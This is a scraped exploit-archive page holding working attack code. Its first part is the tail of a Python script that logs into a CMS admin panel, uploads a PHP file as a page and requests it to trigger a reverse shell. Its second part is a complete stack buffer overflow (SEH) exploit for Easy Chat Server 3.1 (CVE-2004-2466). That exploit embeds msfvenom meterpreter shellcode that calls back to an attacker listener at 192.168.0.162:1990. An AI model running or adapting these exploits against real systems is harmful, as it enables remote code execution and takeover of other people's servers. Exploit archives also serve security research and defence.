"Upgrade-Insecure-Requests": "1", } post_data = { "title": f"{random_filename.name}", "save": "Add Page", "check_sidebar": "sidebar", "content": f"{file_contents}" } url_request = requests.post( address + 'data/nanoadmin.php?action=addpage', headers=post_header, data=post_data, verify=False, timeout=30 ) if url_request.status_code == 404: print( f"{settings.c1}{settings.i2}{arguments.option.address} could " f"not be uploaded.{settings.c0}" ) sys.exit(1) else: print( f"{settings.c2}{settings.i1}file posted." f"{settings.c0}" ) print( f"{settings.i3}if successful, file location should be at:" f"\n{address}data/pages/{random_filename.name}.php" ) def execute(address, file, name): print( f"{settings.i3}making web request to uploaded file." ) print( f"{settings.i3}check listener if reverse shell uploaded." ) url_request = requests.get( address + f'data/pages/{random_filename.name}.php', verify=False ) if url_request.status_code == 404: print( f"{settings.c1}{settings.i2}{arguments.option.file} could " f"not be found." f"\n{settings.i2}antivirus may be blocking your upload." f"{settings.c0}" ) else: sys.exit() def main(): try: arguments() term_settings() address_check(arguments.option.address) random_filename() if arguments.option.execute: login( arguments.option.address, arguments.option.user, arguments.option.passwd ) exploit( arguments.option.address, arguments.option.file, random_filename.name, ) execute( arguments.option.address, arguments.option.file, random_filename.name, ) else: login( arguments.option.address, arguments.option.user, arguments.option.passwd ) exploit( arguments.option.address, arguments.option.file, random_filename.name, ) except KeyboardInterrupt: print(f"\n{settings.i3}quitting.") sys.exit() except requests.exceptions.Timeout: print( f"{settings.c1}{settings.i2}the request timed out " f"while attempting to connect.{settings.c0}" ) sys.exit() except requests.ConnectionError: print( f"{settings.c1}{settings.i2}could not connect " f"to {arguments.option.address}{settings.c0}" ) sys.exit() except FileNotFoundError: print( f"{settings.c1}{settings.i2}{arguments.option.file} " f"could not be found.{settings.c0}" ) except ( requests.exceptions.MissingSchema, requests.exceptions.InvalidURL, requests.exceptions.InvalidSchema ): print( f"{settings.c1}{settings.i2}a valid schema and address " f"must be supplied.{settings.c0}" ) sys.exit() if __name__ == "__main__": main()
HireHackking

Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)

HACKER · %s · %s

# Exploit Title: Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH) # Exploit Author: r00tpgp @ http://www.r00tpgp.com # Usage: python easychat-exploit.py <victim-ip> <port> # Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990 # CVE: CVE-2004-2466 # Installer: http://www.echatserver.com/ # Tested on: Microsoft Windows 11 Pro x86-64 (10.0.22000 N/A Build 22000) #!/usr/bin/python3 import sys import socket from struct import pack host = sys.argv[1] # Recieve IP from user port = int(sys.argv[2]) # Recieve Port from user junk = b"A" * 217 nseh = pack("<L", 0x06eb9090) # short jump 6 bytes seh = pack("<L", 0x1001ae86) # pop pop ret 1001AE86 SSLEAY32.DLL # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990 -f python -b "\x00\x20" -v shellcode shellcode = b"\x90" * 16 shellcode += b"\xbb\xb4\xa4\x34\xc3\xdd\xc1\xd9\x74\x24\xf4\x5a\x33" shellcode += b"\xc9\xb1\x52\x31\x5a\x12\x03\x5a\x12\x83\x5e\x58\xd6" shellcode += b"\x36\x62\x49\x95\xb9\x9a\x8a\xfa\x30\x7f\xbb\x3a\x26" shellcode += b"\xf4\xec\x8a\x2c\x58\x01\x60\x60\x48\x92\x04\xad\x7f" shellcode += b"\x13\xa2\x8b\x4e\xa4\x9f\xe8\xd1\x26\xe2\x3c\x31\x16" shellcode += b"\x2d\x31\x30\x5f\x50\xb8\x60\x08\x1e\x6f\x94\x3d\x6a" shellcode += b"\xac\x1f\x0d\x7a\xb4\xfc\xc6\x7d\x95\x53\x5c\x24\x35" shellcode += b"\x52\xb1\x5c\x7c\x4c\xd6\x59\x36\xe7\x2c\x15\xc9\x21" shellcode += b"\x7d\xd6\x66\x0c\xb1\x25\x76\x49\x76\xd6\x0d\xa3\x84" shellcode += b"\x6b\x16\x70\xf6\xb7\x93\x62\x50\x33\x03\x4e\x60\x90" shellcode += b"\xd2\x05\x6e\x5d\x90\x41\x73\x60\x75\xfa\x8f\xe9\x78" shellcode += b"\x2c\x06\xa9\x5e\xe8\x42\x69\xfe\xa9\x2e\xdc\xff\xa9" shellcode += b"\x90\x81\xa5\xa2\x3d\xd5\xd7\xe9\x29\x1a\xda\x11\xaa" shellcode += b"\x34\x6d\x62\x98\x9b\xc5\xec\x90\x54\xc0\xeb\xd7\x4e" shellcode += b"\xb4\x63\x26\x71\xc5\xaa\xed\x25\x95\xc4\xc4\x45\x7e" shellcode += b"\x14\xe8\x93\xd1\x44\x46\x4c\x92\x34\x26\x3c\x7a\x5e" shellcode += b"\xa9\x63\x9a\x61\x63\x0c\x31\x98\xe4\xf3\x6e\xd4\xf0" shellcode += b"\x9b\x6c\x18\xf8\xe6\xf8\xfe\x90\x08\xad\xa9\x0c\xb0" shellcode += b"\xf4\x21\xac\x3d\x23\x4c\xee\xb6\xc0\xb1\xa1\x3e\xac" shellcode += b"\xa1\x56\xcf\xfb\x9b\xf1\xd0\xd1\xb3\x9e\x43\xbe\x43" shellcode += b"\xe8\x7f\x69\x14\xbd\x4e\x60\xf0\x53\xe8\xda\xe6\xa9" shellcode += b"\x6c\x24\xa2\x75\x4d\xab\x2b\xfb\xe9\x8f\x3b\xc5\xf2" shellcode += b"\x8b\x6f\x99\xa4\x45\xd9\x5f\x1f\x24\xb3\x09\xcc\xee" shellcode += b"\x53\xcf\x3e\x31\x25\xd0\x6a\xc7\xc9\x61\xc3\x9e\xf6" shellcode += b"\x4e\x83\x16\x8f\xb2\x33\xd8\x5a\x77\x43\x93\xc6\xde" shellcode += b"\xcc\x7a\x93\x62\x91\x7c\x4e\xa0\xac\xfe\x7a\x59\x4b" shellcode += b"\x1e\x0f\x5c\x17\x98\xfc\x2c\x08\x4d\x02\x82\x29\x44" buffer = b"GET /chat.ghp?username=" + junk + nseh + seh + shellcode + b"&password=&room=1&sex=1 HTTP/1.1\r\n" buffer += b"User-Agent: Mozilla/4.0\r\n" buffer += b"Host: 192.168.1.136:80\r\n" buffer += b"Accept-Language: en-us\r\n" buffer += b"Accept-Encoding: gzip, deflate\r\n" buffer += b"Referer: http://192.168.1.136\r\n" buffer += b"Connection: Keep-Alive\r\n\r\n" print("[*] Sending evil buffer...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(buffer) s.close() print("[+] Done!")